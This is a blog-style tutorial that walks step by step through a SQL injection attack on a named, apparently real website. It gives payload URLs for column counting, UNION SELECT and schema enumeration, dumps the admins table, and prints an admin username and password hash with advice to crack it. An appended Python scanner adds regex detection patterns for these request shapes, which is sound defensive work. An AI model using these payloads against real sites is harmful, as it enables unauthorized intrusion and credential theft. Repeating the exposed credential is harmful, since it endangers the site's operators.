SQL Injection
This article is about how to hack a website with SQL injection. I and oceanofanythingg.blogspot.com take no responsibility for its misuse.
We have a target, http://www.allaboutcar.net/articles.php?topic=-3. Let's see if it is vulnerable to SQL injection. To check, put a ' at the end:
http://www.allaboutcar.net/articles.php?topic=3'
It gives a MySQL database error, which means it is vulnerable to SQL injection. Next, let's get the number of columns. To do that you need the "order by" command: put it at the end with an increasing count.
For example:
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--
Do that until you get an error.
It gives an error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--
That means it only has 5 columns, because it didn't give an error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
OK, let's do the union. To do this you need the "union select" command:
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--
Like that.
A number should pop up somewhere on the page.
We got number 2 popped, so let's inject into 2.
First we need to check the DB version. If it's 5, we continue; if it's version 4, you have to guess the tables and columns. To check the database version, use "@@version" or "version()". It's version 5:
5.0.67
OK, now let's get the table names. To do that you need these:
group_concat(table_name)
information_schema.tables
We put this because we need the tables of the default database:
where table_schema=database()--
Now we have the list of tables:
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
Admins,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,forum_c,gbook,infopages,jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,users
OK, we have the admin table here. Let's get the columns now. To do that, just change this:
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
to
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--
Now we have the columns:
id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,topic,author,id,ip,date,id,title,alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,what,date,wid,name,mail,title,text,ip,id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,
Now let's put this together!
Table: admins
Columns: id,nick,pass
Here we ask for the data in those columns from the admins table:
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
Now we have the id, nick and password hash. You need to use an MD5 cracker to crack this password.
So friends, that's all for this tutorial.
Username : MaTySeK,
Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
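A defender's view of the walkthrough above, as an added example that is not part of the original article: the requests it describes leave recognizable shapes in a web server's access log. The log lines, IP addresses, signature names and function names below are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Request shapes from the walkthrough above, matched on decoded parameter values.
SIGNATURES = {
    "quote_probe":   re.compile(r"^-?\d+\s*'"),
    "order_by_enum": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum":   re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(", re.I),
    "group_concat":  re.compile(r"\bgroup_concat\s*\(", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges), not taken from any real server.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /articles.php?topic=3 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?q=union+station+select+seats HTTP/1.1" 200 900
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /articles.php?topic=3%27 HTTP/1.1" 200 310
203.0.113.9 - - [01/Jan/2024:10:01:04 +0000] "GET /articles.php?topic=3+order+by+6-- HTTP/1.1" 200 310
203.0.113.9 - - [01/Jan/2024:10:01:09 +0000] "GET /articles.php?topic=-3%20UNION%20SELECT%201,2,3,4,5-- HTTP/1.1" 200 4800
203.0.113.9 - - [01/Jan/2024:10:01:20 +0000] "GET /articles.php?topic=-3+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables-- HTTP/1.1" 200 5300
"""


def scan(log_text):
    """Map each client IP to the set of signature names its requests matched."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl percent-decodes and turns '+' into a space, so encoded probes still match.
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for name, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits[ip].add(name)
    return dict(hits)


def flag_clients(log_text, min_signatures=2):
    """Return IPs matching several distinct signatures; one stray quote alone is not flagged."""
    return sorted(ip for ip, names in scan(log_text).items() if len(names) >= min_signatures)


if __name__ == "__main__":
    print(scan(SAMPLE_LOG), flag_clients(SAMPLE_LOG))
```

Requiring several distinct signatures per client keeps a single stray apostrophe or an innocent search phrase from raising an alert. Log matching is a backstop: the underlying flaw is that the `topic` value reaches the SQL statement without being parameterized.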